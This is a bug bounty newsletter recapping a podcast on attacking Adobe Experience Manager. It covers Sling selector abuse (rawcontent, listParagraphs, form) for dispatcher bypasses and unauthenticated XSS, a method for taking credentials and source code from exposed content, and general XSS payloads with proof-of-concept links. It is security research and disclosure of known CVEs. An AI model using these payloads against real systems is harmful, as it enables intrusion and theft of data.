[HackerNotes Ep. 176] AEM Deep Dive with Jim Green: Sling Selectors, Dispatcher Bypasses, and XSS Gadgets

Today, we deep dive AEM with Jim Green

Hacker TL;DR

  • Apache Sling adds two URL components on top of the standard path: selectors (between filename and extension) and suffixes (after the extension, starting with /). Both feed into Sling's resource resolution and open a massive untested attack surface

  • Three AEM core-product selectors (rawcontent, listParagraphs, form) broke nearly every unauthenticated AEM instance in the wild. Two of them are dispatcher bypasses that hand you internal endpoints like /bin/querybuilder.json

  • AEM permissions ship with a footgun: the anonymous user is part of the everyone group by default, so every "open to all users" rule also applies to unauthenticated visitors

  • Three reusable XSS primitives outside AEM: moment.js format injection via square brackets, jQuery .text() re-decoding HTML entities, and javascript: URIs populating both hostname and pathname on the URL object

Today’s Sponsor: Adobe. Earn more for AI bugs with Adobe’s new AI Tier! https://blog.adobe.com/security/adobe-expands-bug-bounty-program-to-incentivize-ai-security-research

Also don’t forget to also grab a 10% bonus for valid AI vulnerabilities in Adobe Stock and Lightroom Web.

Use code: CTBB063026 in your report.
Expires June 30, 2026.

In the News

Who's Jim Green

Jim Green (@GreenJamSec) spent 20 years in software development, mainly on banking systems, before transitioning to bug bounty full time in October 2025. He learned AEM as a consultant building customer implementations on top of the platform, then carried that internal knowledge into the Adobe VIP program where he now has 600+ CVEs to his name (overwhelmingly XSS). Jim is also the HackerOne UK Brand Ambassador alongside Nathan Jones (NJCVE).

Bring a Bug: MasterCard, QueryBuilder, and the etc/packages Heist

Jim's first paid bug was on an AEM instance with QueryBuilder exposed (behind a trivial WAF bypass). QueryBuilder is the internal search interface for the Java Content Repository, normally locked down for developer use only. Once accessible, he pivoted into /etc/packages, which stores the deployment artifacts for the customer's own code sitting on top of AEM.

The packages contained:

  • Full source code for the customer's implementation

  • Plaintext credentials for their internal MySQL database

  • Akamai API keys (full WAF rule control, potential origin pivoting)

The structural lesson: every time AEM is deployed via CI/CD or through the Package Manager web UI, the resulting zip lands under /etc/packages. If permissions there are loose, the entire codebase is downloadable. Also worth noting, crx-quickstart/install/ is an arbitrary-file-write to RCE path: drop a deployable zip there, and AEM installs it on next restart.

AEM Architecture

  • Author instance - internal CMS where editors and devs work. Replication agents push approved content to publishers

  • Publish instance - public-facing. Hosts the actual rendered pages

  • Dispatcher - Apache HTTPD reverse proxy in front of publish, handles caching, load balancing, and (often) ACLs

  • WAF - usually Akamai or similar, sitting in front of the dispatcher

Two AEM deployment flavors matter for hunting. AMS (Adobe Managed Services) is the on-prem/self-hosted version, possibly hosted by Adobe on AWS. AEM as a Cloud Service is the SaaS version, more locked down (admins cannot write to executable paths, no easy RCE primitives). For spraying core-product bugs, AMS instances are where you score.

Inside the JCR, the folder layout to memorize:

  • /libs - Adobe's core product code (JSPs, HTLs, servlets)

  • /apps - customer overrides and custom implementations

  • /etc/packages - deployment artifacts

  • /content - the actual web pages

  • /content/dam - assets (images, PDFs, sometimes spreadsheets with PII)

Pro Tip on /content: Jim regularly finds employee lists with SSNs, plaintext credentials, IP inventories of internal architecture, and documents marked "strictly confidential" living under /content. Authors use AEM as a convenient file transfer mechanism. Worth checking on every black-box AEM instance.

Apache Sling URL Anatomy

This is the unique-to-AEM part most hunters miss. Sling extends a normal URL with two extra fields:

scheme://host/path/filename.selector1.selector2.extension/suffix?query#fragment
  • Selectors sit between the filename and the extension. You can chain multiple

  • Suffix comes after the extension and starts with /. Often a path, but free-form

Concrete example: /content/page.list.html/sub/path resolves to the resource /content/page with selector list, extension html, suffix /sub/path.

Sling's resource resolution decides which servlet handles the request using an order of precedence:

  1. Java servlet registered with an exact path (this is how /bin/querybuilder.json works)

  2. Java servlet registered by combination of sling:resourceType, selector, primary type, or extension

  3. sling:resourceType pointing to a JSP or HTL in /apps

  4. Same lookup falling through to /libs if /apps does not override

  5. DefaultGETServlet as the catch-all (this is how .infinity.json works to recursively dump nodes)

The selectors at level 2 are where Jim's bugs live. AEM ships with built-in core selectors registered on common patterns (e.g., CQ Page + .html extension), and customers can register their own. Both surfaces are underexplored.

We do subs at $25, $10, and $5, premium subscribers get access to:

Hackalongs: live bug bounty hacking on real programs, VODs available
Live data streams, exploits, tools, scripts & un-redacted bug reports

Need a Pentest? We just launched CTBB Pentests!

Hack full time? Check out the Full-Time Hunter’s Guild!

Bug 1: The rawcontent Selector (CVE-2022-30677)

Registered on CQ Page with .html extension. Original purpose: strip JavaScript and CSS so content could be exported to other systems.

/path/to/page.rawcontent.html

The implementation used an unsafe HTML serializer, so any stored content with previously-sanitized HTML escapes got re-emitted as raw HTML. Result: stored XSS on any author-controllable content.

The reflection variant was the real prize. The default 404 page reflects the requested path. Append .rawcontent to a non-existent route and the reflected path renders as raw HTML. That was unauthenticated reflected XSS on every AEM instance in the wild that did not have a custom 404 page or dispatcher rules blocking 404s.

When custom 404s started killing the primitive, Jim fuzzed for a paired selector and found savedsearch, which triggers a 400 error with the path reflected. Chaining savedsearch.rawcontent revived the gadget on instances that only blocked 404s, since most customers do not override the 400 page.

When one selector gets walled off by dispatcher rules, fuzz for a second selector that produces the same reflection but on a different error path. Multiple selectors are valid and pass through Sling's resolution in order.

Today, rawcontent still exists and still removes JS and CSS, but the HTML serializer was swapped from htmlwriter to html5-serializer, which preserves sanitization. The edge case Jim noted: if you already have HTML injection elsewhere but JavaScript on the page overrides your sink (e.g., a form action being rewritten on load), rawcontent strips the JS and lets your injection stand.

Bug 2: The listParagraphs Selector (CVE-2022-42351 / CVE-2022-42348)

Same trigger as rawcontent (CQ Page + .html), but it accepts an itemResourceType query parameter that internally re-renders against an arbitrary resource type.

/content/path/page.listParagraphs.html?itemResourceType=/libs/cq/statistics/components/queries-by-result/html.jsp&limit=1&path=<XSS>

What this is: a generic dispatcher bypass. Resource types under /libs are not directly reachable by the dispatcher in well-configured instances. But because Sling resolves the resource internally and Sling permissions are evaluated server-side (not at the dispatcher), listParagraphs will happily render /libs JSPs that an external attacker should never be able to reach.

Two ways to weaponize it:

  1. Point it at QueryBuilder. Set itemResourceType to /libs/cq/statistics/components/queries-by-result/html.jsp, get a list of nodes back with juicy metadata. You now have a backdoor into the JCR even when QueryBuilder is dispatcher-blocked

  2. Point it at any vulnerable /libs JSP. Jim found a reflected XSS in queries-by-result/html.jsp via the path query parameter. Stack it on top of listParagraphs and you get unauthenticated reflected XSS

Bug 3: The form Selector (CVE-2024-26029)

Originally found by LPI and submitted as a collaboration. The servlet was registered on the form selector against the sling/servlet/default resource type with no extension restriction, so it matched every node in the JCR regardless of file extension.

/content/dam.form.css/bin/querybuilder.json

Anatomy:

  • .form is the selector that activates the gadget

  • .css is a throwaway extension. AEM ignores it, dispatchers often allow .css requests where they would block .json or .html

  • /bin/querybuilder.json is the suffix. The form servlet internally forwards the suffix as the new path, so AEM ends up processing the request as if it were just /bin/querybuilder.json

The suffix is what makes this a dispatcher bypass. Whatever rule blocks /bin/querybuilder.json at the dispatcher level sees only the prefix path, not the suffix. Once Sling takes over, the suffix becomes the actual target.

Chaining bugs 2 and 3:

# Request sent (dispatcher only sees .form.js, lets it through):
/content/site/us/en/page.form.js/content/site/us/en/page.listParagraphs.html?itemResourceType=/libs/cq/statistics/components/queries-by-result/html.jsp&path=<XSS>

# Internally forwarded by the form servlet (suffix becomes the path):
/content/site/us/en/page.listParagraphs.html?itemResourceType=/libs/cq/statistics/components/queries-by-result/html.jsp&path=<XSS>

The form selector bypasses any rule blocking .listParagraphs at the dispatcher, then listParagraphs bypasses any rule blocking /libs access. Query parameters pass through both layers. Unauthenticated XSS through two layers of dispatcher hardening.

Methodology: Black-Box Hunting on AEM Instances

Phase 1: Confirm AEM and version

  • Hit common AEM paths: /libs/granite/core/content/login.html, /etc.clientlibs/, /system/console

  • Tag the listParagraphs selector onto any existing page and point itemResourceType at the AEM about page (/libs/granite/ui/components/shell/help/about/about.jsp&limit=1). It returns the AEM version and doubles as a fingerprint check Jim said he runs through nuclei

  • Watch for /etc/clientlibs vs /etc.clientlibs in the page source. The dotted form is the modern proxy version, the slashed form is legacy and suggests /etc is open for reads

Phase 2: Test the unauthenticated primitives

  • .rawcontent paired with .savedsearch on non-existent paths for reflected XSS in the 400/404 page

  • .listParagraphs.html?itemResourceType= pointing at known vulnerable /libs resources from Jim's CVE list

  • .form.<ext>/bin/querybuilder.json?path=/&p.limit=10 for QueryBuilder access through the suffix dispatcher bypass

Phase 3: Mine content for sensitive data

  • Once QueryBuilder is reachable, walk the JCR. Start with .1.json selectors to enumerate top-level folders without tripping the 10,000-node limit

  • Drill down into folders that look internal. Look for spreadsheets, "do not publish" drafts, plaintext credentials, architecture documents

  • For financial institutions: pre-disclosure earnings reports staged in /content before public release would be insider-trading-grade impact

Phase 4: Look for custom selectors

The three selectors covered here are the publicly-documented ones. AEM customers can register their own selectors, and these are essentially unaudited surface. Source-code review (after grabbing /etc/packages) of @SlingServlet annotations and resourceTypes registrations is the path to fresh bugs.

Where to Put the Security Controls

Jim's view on layering security:

  • ACLs at the JCR level are the only real control. Apply restrictive permissions on /libs, /etc, internal /content paths

  • Dispatcher rules are not a security control. They are a cache and proxy with a security-adjacent rule engine. The rules are typically written against the raw path and miss selector/suffix manipulations

  • WAF rules are useful for incident response (block these selectors right now while we patch) but should not be the primary defense

The real mitigation for all three bugs is to upgrade AEM. Dispatcher-level blocks of .rawcontent, .listParagraphs, and .form selectors are stopgaps that fail to alternative selectors, chained selectors, or path-encoding tricks.

Bonus: Three Underrated XSS Gadgets

Jim shipped three POC pages on his domain that demonstrate sink primitives worth keeping in your hunting checklist.

moment.js Format Injection

If user input controls the format argument to moment().format() and the output lands in innerHTML, you have XSS. moment.js supports literal strings in format patterns via square brackets:

moment().format("[<img src=x onerror=alert(document.domain)>]")

The brackets tell moment to emit the contents verbatim instead of treating them as date tokens. Jim was rejecting this for years before Claude insisted it was vulnerable and built the POC. moment.js is deprecated but still extremely common.

POC: https://poc.greenjam.co.uk/just-a-moment.html?date=2026-05-07&format=[<img src=x onerror=alert(document.domain)>]

jQuery .text() Re-Decoding Entities

Jim's POC sanitizes input through DOMPurify, wraps the result in a <div>, calls .text() on it, then writes the text into innerHTML:

const cleanValue = DOMPurify.sanitize(value);
const $clean = $('<div>' + cleanValue + '</div>');
const text = $clean.text();
document.getElementById('output').innerHTML = text;

The bypass: send an entity-encoded payload like &lt;img src=x onerror=alert(document.domain)&gt;. DOMPurify treats the entities as literal text and passes them through unchanged. When jQuery builds the <div>, the browser HTML parser decodes the entities into the div's text content. .text() then reads that text back as the raw string <img src=x onerror=...>, and writing it to innerHTML re-parses it as HTML and fires.

The pattern shows up anywhere code "sanitizes once, reuses many times." .text(), .val(), and .textContent all decode entities on read. Always check what happens to sanitized output when it gets read back.

POC: https://poc.greenjam.co.uk/text-xss.html

javascript: URIs Populate hostname AND pathname

Already covered on the pod that new URL("javascript://example.com") returns hostname === "example.com". The less-known extension: pathname, port, hash, and searchParams also get populated.

let u = new URL("javascript://example.com:443/anything?key=val#frag\nalert(document.domain)");
// u.hostname === "example.com"
// u.pathname === "/anything"
// u.port     === "443"
// u.searchParams.get("key") === "val"

Jim's POC parses the input as new URL(value), validates hostname === 'example.com' and pathname.startsWith('/anything'), then calls window.open(value) with the raw user-controlled string. The bypass: in a javascript: URI, :// starts a single-line JavaScript comment that absorbs the host and path tokens. A %0a newline ends the comment, and whatever follows executes.

Resources

That's it for the week, keep hacking!